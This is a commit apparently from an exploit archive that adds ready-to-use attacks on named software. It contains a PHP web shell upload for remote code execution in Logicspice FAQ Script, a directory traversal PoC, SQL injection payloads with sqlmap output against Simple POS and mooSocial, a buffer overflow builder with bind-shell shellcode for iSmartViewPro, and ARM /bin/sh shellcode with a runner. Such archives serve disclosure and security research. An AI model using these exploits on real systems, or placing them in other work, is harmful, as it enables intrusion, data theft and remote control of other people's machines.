DB: 2018-09-05

6 changes to exploits/shellcodes iSmartViewPro 1.5 - 'DDNS' Buffer Overflow Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection mooSocial Store Plugin 2.6 - SQL Injection Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)
2018-09-05 05:01:52 +00:00 · 2018-09-05 05:01:52 +00:00 · 14bdc56535
commit 14bdc56535
parent 925b2171f4
8 changed files with 338 additions and 0 deletions
--- a/exploits/php/webapps/45326.txt
+++ b/exploits/php/webapps/45326.txt
@ -0,0 +1,56 @@
 # Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
 # Dork: N/A
 # Date: 2018-09-03
 # Exploit Author: Özkan Mustafa Akkuş (AkkuS)
 # Vendor Homepage: https://www.logicspice.com/products/faq-script
 # Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
 # Version: 2.9.7
 # Category: Webapps
 # Tested on: Kali linux
 # Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
 # leads to a remote command execution on the remote server.
 # 1) Create a file with the below PHP code and save it as .php
 <?php $cmd=$_GET['cmd']; system($cmd); ?>
 # 2) Login to FAQ Script admin portal as priviliage user
 # 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
 # 4) Click at the Actions button of a current FAQ product --> Edit
 # 5) Click (Image) button on Content panel.
 # 6) Chose Upload section and browse your .php file.
 # 7) Finaly click "Send it to Server". Script will give you a link belong to
 # our php file.
 # 8) verift the exploit:
 # http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id
 # The request:
 POST
 /admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
 HTTP/1.1
 Host: faq-script.logicspice.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer:
 http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter
 Cookie: __asc=3c88bfff1659e6148e6168c52d2;
 __auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
 _gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
 admin_username=logicspice; admin_password=faqscript_admin;
 CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Content-Type: multipart/form-data;
 boundary=---------------------------1036720403269880351068202740
 Content-Length: 267
 -----------------------------1036720403269880351068202740
 Content-Disposition: form-data; name="upload"; filename="shell.php"
 Content-Type: application/x-php
 <?php $cmd=$_GET['cmd']; system($cmd); ?>
 -----------------------------1036720403269880351068202740--
--- a/exploits/php/webapps/45327.txt
+++ b/exploits/php/webapps/45327.txt
@ -0,0 +1,34 @@
 # Exploit Title: PHP File Browser Script 1 - Directory Traversal
 # Dork: N/A
 # Date: 2018-09-03
 # Exploit Author: Özkan Mustafa Akkuş (AkkuS)
 # Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
 # Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: Kali linux
 # Description : The "index.php" is vulnerable to directory traversal.
 # An attacker can see and read all files known by the name
 # Vulnerable File: index.php
 <?php // line 45
 72  $script = basename(__FILE__); // the name of this script
 73  $path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access
 74
 75  if($loc!=''){
 76  echo "<p id='bloc'><b>Browsing Location: </b><a href='index.php'><b>".ucfirst($loc1)."</b></a>
 77  <a href='$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>
 78  <a href=''><b>".ucfirst($locdem3)."</b></a></p>";}
 79  else{
 80    echo "<p id='bloc'><b>Browsing Location: </b><a href=''><b>Demo</b></a></p>";
 ?> // line 151
 # PoC :
 https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]
 # You can write the known directory name instead of [DirectoryName].
 # Example: '/etc/' or '/var/www/'  
 # https://Target/scripts/php/file-browser-demo/index.php?path=/etc/
--- a/exploits/php/webapps/45328.txt
+++ b/exploits/php/webapps/45328.txt
@ -0,0 +1,45 @@
 # Exploit Title: Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection
 # Google Dork: N/A 
 # Date: 2018-08-31
 # Exploit Author: Renos Nikolaou
 # Software Link: https://codecanyon.net/item/simple-pos-point-of-sale-made-easy/3947976
 # Vendor Homepage: https://tecdiary.com/
 # Version: 4.0.24
 # Tested on: Windows 10
 # CVE: N/A
 # Description : The vulnerability allows an attacker to inject sql commands on 'columns[0][search][value]' parameters in the management panel.
 # PoC:
 http://domain.com/spos/products
 POST /spos/products/get_products/1 HTTP/1.1
 Host: domain.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://domain.com/spos/products
 Content-Length: 2085
 Cookie: spos_spos_cookie=ab62f546025dd1a7d652ba75d13b87dc; spos_session=049soe8cr49aq318q7qhqlic6kpdgdee
 Connection: close
 draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
 # SQLMap Result:
 # SQLmap command: ./sqlmap.py  -r spos.txt --dbms=mysql -v4 -p 'columns[0][search][value]' --banner --level 5 --risk 3 --tamper=space2comment --random-agent
 Parameter: columns[0][search][value] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc
 Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
 ---
 web server operating system: Windows
 web application technology: PHP 7.1.16, Apache 2.4.33
 back-end DBMS: MySQL >= 5.0.12
 banner:    '10.1.31-MariaDB'
--- a/exploits/php/webapps/45330.txt
+++ b/exploits/php/webapps/45330.txt
@ -0,0 +1,44 @@
 # Exploit Title: mooSocial Store Plugin 2.6 - SQL Injection
 # Exploit Author: Andrea Bocchetti
 # Date: 2018-08-28
 # Google Dork: N/A - 
 # Vendor: https://moosocial.com/product/store-plugins/
 # Software Link: https://moosocial.com/product/store-plugins/
 # Demo URL: http://addons.moosocial.com/stores
 # Purchase link: https://moosocial.com/addons/
 # Affected Version: all versions
 # Patched Version: 2.7
 # Category: Web Application
 # Platform: PHP
 # Tested on: Ubuntu
 # CVE: N/A
 # 1. Technical Description:
 # mooSocial Store Plugin is affected by Blind SQL Injection in the product parameter used with URL Rewrite 
 GET /stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 HTTP/1.1
 Host: addons.moosocial.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: CAKEPHP=2b0v0a2360nhl46psmm1mejsi7
 Connection: close
 Upgrade-Insecure-Requests: 1
 # 3. Payload:
 # Parameter: #1* (URI)
 # Type: boolean-based blind
 # Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND 5011=5011
 # Type: stacked queries
 # Title: MySQL > 5.0.11 stacked queries (comment)
 # Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65;SELECT SLEEP(5)#
 # Type: AND/OR time-based blind
 # Title: MySQL >= 5.0.12 AND time-based blind
 Payload: http://xxx.xxx/stores/product/2015-fashion-new-men-39-s-short-sleeved-shirt-slim-m-3xl-65 AND SLEEP(5)
--- a/exploits/windows_x86/local/45325.py
+++ b/exploits/windows_x86/local/45325.py
@ -0,0 +1,57 @@
 # Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
 # Discovery by: Luis Martinez
 # Discovery Date: 2018-09-03
 # Vendor Homepage: https://securimport.com/
 # Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
 # Tested Version: 1.5
 # Vulnerability Type: Buffer Overflow
 # Tested on OS: Windows XP Professional SP3 x86 es
 # Steps to Produce the Buffer Overflow: 
 # 1.- Run python code : iSmartViewPro_1.5.py
 # 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard
 # 3.- Open iSmartViewPro
 # 4.- Add Device
 # 5.- Add device manually
 # 6.- Device alias -> test
 # 7.- Paste ClipBoard on "DDNS/IP/DID"
 # 8.- Account -> admin
 # 9.- Password -> admin
 # 10.- Save
 #!/usr/bin/env python
 #7E6B30D7 FFE4 JMP ESP SHELL32.dll
 ret = "\xD7\x30\x6B\x7E"
 #msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
 shellcode = (
 "\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
 "\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
 "\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
 "\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
 "\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
 "\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
 "\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
 "\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
 "\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
 "\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
 "\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
 "\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
 "\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
 "\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
 "\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
 "\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
 "\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
 "\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
 "\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
 "\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
 "\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
 "\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
 "\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
 "\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
 buffer = "\x41" * 383 + ret + "\x90" * 8 + shellcode
 f = open ("iSmartViewPro_1.5.txt", "w")
 f.write(buffer)
 f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9936,6 +9936,7 @@ id,file,description,date,author,type,platform,port
 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
 45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
 45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
 45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39917,3 +39918,7 @@ id,file,description,date,author,type,platform,port
 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
 45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
 45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,
 45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,
 45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -907,3 +907,4 @@ id,file,description,date,author,type,platform
 45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
--- a/shellcodes/arm/45329.c
+++ b/shellcodes/arm/45329.c
@ -0,0 +1,96 @@
 /*
 # Title:  Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
 # Date:   2018-08-31
 # Tested: armv7l (Raspberry Pi 3 Model B+)
 # Author: Ken Kitahara
 [System Information]
 pi@raspberrypi:~ $ uname -a
 Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
 pi@raspberrypi:~ $ lsb_release -a
 No LSB modules are available.
 Distributor ID:	Raspbian
 Description:	Raspbian GNU/Linux 9.4 (stretch)
 Release:	9.4
 Codename:	stretch
 pi@raspberrypi:~ $
 [Procedure]
 (1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode (20 Bytes).
 pi@raspberrypi:~ $ cat binsh.s
 .section .text
 .global _start
 _start:
    .THUMB
    // execve("/bin/sh", NULL, NULL)
    adr  r0, spawn
    eor  r1, r1, r1
    eor  r2, r2, r2
    strb r2, [r0, #7]
    mov  r7, #0xb
    svc  #1
 spawn:
 .ascii "/bin/shX"
 pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
 pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
 pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin && echo
 \x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
 pi@raspberrypi:~ $
 (2) Create stager shellcode (20 Bytes).
 pi@raspberrypi:~ $ cat stager.s
 .section .text
 .global _start
 _start:
    .ARM
    add  lr, pc, #1
    bx   lr
    .THUMB
    // read(0, buf, 0xff)
    eor  r0, r0, r0
    adr  r1, loadpoint
    mov  r2, #0xff
    mov  r7, #3
    svc  #1
    mov  pc, r1
 loadpoint:
 pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
 pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
 pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
 \x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x02\xa1\xff\x22\x03\x27\x01\xdf\x8f\x46
 pi@raspberrypi:~ $
 (3) Operation test.
 pi@raspberrypi:~ $ (echo -ne "\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
 id
 uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
 exit
 ^C
 pi@raspberrypi:~ $
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char sc[] = \
 "\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
 "\x40\x40\x02\xa1\xff\x22\x03\x27"
 "\x01\xdf\x8f\x46";
 void main()
 {
    printf("Shellcode Length: %d\n", strlen(sc));
    int (*ret)() = (int(*)())sc;
    ret();
 }